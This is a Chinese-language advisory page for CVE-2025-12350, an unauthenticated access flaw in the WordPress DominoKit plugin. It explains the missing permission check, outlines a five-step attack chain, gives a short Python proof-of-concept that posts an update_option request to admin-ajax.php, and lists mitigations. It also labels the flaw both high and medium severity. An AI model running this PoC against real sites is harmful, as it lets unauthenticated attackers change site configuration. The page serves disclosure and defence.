CVE-2025-12350 CVSS 5.3 中危

CVE-2025-12350 WordPress DominoKit插件AJAX未授权访问漏洞

披露日期: 2025-11-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12350

漏洞类型

缺少授权/权限检查

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress DominoKit plugin

漏洞概述

CVE-2025-12350是WordPress DominoKit插件中的一个高危安全漏洞。该插件在1.1.0及以下所有版本中存在未授权访问缺陷，原因是wp_ajax_nopriv_dominokit_option_admin_action AJAX端点缺少适当的权限验证机制。攻击者无需任何认证即可调用该端点，非法修改插件配置设置。此漏洞属于OWASP Top 10中的Broken Access Control类别，CVSS 3.1评分5.3（中等严重程度）。由于该漏洞允许未认证攻击者更改插件设置，可能导致网站功能异常或被恶意利用，对WordPress站点的安全性和完整性构成威胁。

技术细节

漏洞根源在于DominoKit插件的AJAX处理逻辑存在访问控制缺陷。插件注册了wp_ajax_nopriv_dominokit_option_admin_action这个AJAX动作处理器，但该处理器直接处理管理员级别的配置操作而未验证请求者是否具有相应权限。标准的WordPress AJAX处理流程中，wp_ajax_*动作默认要求用户登录，而wp_ajax_nopriv_*动作则允许未登录用户访问。插件开发者错误地使用了nopriv变体，且未在处理器内部实现权限检查（如current_user_can()验证）。攻击者只需构造带有domino_kit_action参数的POST请求到wp-admin/admin-ajax.php，即可触发漏洞。成功利用后可修改插件数据库选项，可能导致持久性攻击或功能滥用。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否安装并启用DominoKit插件（通过扫描插件特征或版本检测）

STEP 2

步骤2

攻击者构造恶意HTTP POST请求，指向wp-admin/admin-ajax.php端点，设置action参数为dominokit_option_admin_action

STEP 3

步骤3

在请求中添加domino_kit_action及相应参数，尝试修改插件配置选项（如update_option等操作）

STEP 4

步骤4

服务器端接收请求后，由于缺少current_user_can()权限验证，AJAX处理器直接执行配置更新操作

STEP 5

步骤5

插件设置被非法修改，攻击者可能利用修改后的配置实现持久化攻击或进一步利用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-12350 PoC - DominoKit Plugin Unauthorized Admin Action
# Target: WordPress site with DominoKit plugin <= 1.1.0

target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php"

# Malicious payload to modify plugin settings
data = {
    "action": "dominokit_option_admin_action",
    "domino_kit_action": "update_option",
    "option_name": "malicious_option",
    "option_value": "malicious_value"
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    if response.status_code == 200:
        print("[+] PoC executed - Unauthorized admin action may have succeeded")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

DominoKit plugin <= 1.1.0

防御指南

临时缓解措施

立即临时缓解措施：1) 在wp-config.php中添加IP黑名单阻止可疑请求；2) 使用WAF规则阻断对admin-ajax.php的异常POST请求；3) 临时禁用DominoKit插件直到可用的安全更新发布；4) 监控wp_options表中插件相关配置的变更记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表